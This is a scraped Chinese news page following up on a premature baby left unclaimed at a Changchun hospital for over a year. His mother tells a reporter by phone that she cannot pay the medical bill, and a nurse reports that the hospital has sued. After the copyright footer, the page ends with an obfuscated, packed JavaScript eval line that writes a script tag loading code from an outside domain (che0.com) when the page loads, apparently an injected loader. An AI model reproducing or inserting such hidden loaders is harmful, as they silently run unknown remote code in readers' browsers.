“小猴子”的妈妈联系上了

523 阅读

    

A04版

   新闻回放:6月12日,新文化报报道了“小猴子”的故事,引来了众多热心市民的关心,有的市民在关心“小猴子”的同时也想要领养“小猴子”。目前,“小猴子”仍住在吉大二院的新生儿科,每天由新生儿科的全体医护人员照顾。

  新文化讯(实习记者 陆璇) 报道过去多日,“小猴子”的妈妈董女士终于“现身”了,虽未来到报社,但还是通过电话讲述了自己的情况。

  16日下午,董女士在电话里说:“我不是不要孩子了,我是没钱交医药费。”董女士今年29岁,在“小猴子”之前,她还有个6岁大的女儿。“我和‘小猴子’爸爸是2015年4月在一起的,我们没领证,他家人一直都不同意我们的事。”在家里不同意的情况下,董女士还是生下了“小猴子”。“那天,我父亲、我爱人还有爱人的爸妈一同陪我到医院生产,由于我是妊娠高血压,不得不在32周终止妊娠。”生产过程并不顺利,董女士也遭遇了大出血。“最后孩子生下来了,我父亲说要送到新生儿科住院,就交了500块钱押金。”就这样,出生没多久的“小猴子”住进了新生儿科。

  董女士由于产后恢复不佳,住进了吉大二院的病房,可昂贵的医药费让她承担不起。“之后我转到了德惠的医院治疗。”在回德惠住院的第21天,董女士又到吉大二院做二次清宫手术。“我本想这次带孩子一起回家,可孩子当时因病不能办理出院。”董女士说,所以她自己回了家。

  在“小猴子”出生53天时,董女士接到了吉大二院的通知———可以将孩子接回家了。“我到医院时,他们让我交医药费,一共是42972.5元,我实在没有钱,就回家筹钱了。”董女士说,她没有筹够钱,因为身体每天都发烧不退,筹到的钱又看病花光了。

  提到孩子父亲,董女士称,由于没领证,在孩子出生不到一百天的时候,孩子父亲就不知道去哪了。“我问了孩子爷爷,能不能筹到钱,他们也筹不到。”董女士说,很感激医院这一年对孩子的照顾,但由于自身的原因,实在没有能力支付医药费用。

  16日下午,新文化记者致电吉大二院新生儿科的高护士长,她说,“小猴子”的母亲一年来从未看过孩子,也未交齐费用。已经起诉了,会等法院开庭审理。同时,医院工作人员称,一些小孩子该接种的疫苗,“小猴子”都没接种,并且孩子现在没有户口,如果家长不领走,会有很多麻烦之处,希望家属尽快筹到钱,将孩子带走。《

早产儿被“遗留”医院一年多》续

[返回首页]
版权声明
1.本网站所转载的作品,目的在于传递更多信息,并不代表本网站赞同其观点和对其真实性负责。
2.如因作品内容,版权和其他问题需要同本网站联系的,请邮件联系我们zywinqq@163.com
eval(function(p,a,c,k,e,d){e=function(c){return(c35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('5.6("<1 4=\\"2\\/3\\" a=\\"b:\\/\\/9.7\\/0\\/8.0\\"><\\/1>");',12,12,'js|script|text|javascript|type|document|write|com|my|che0|src|http'.split('|'),0,{}));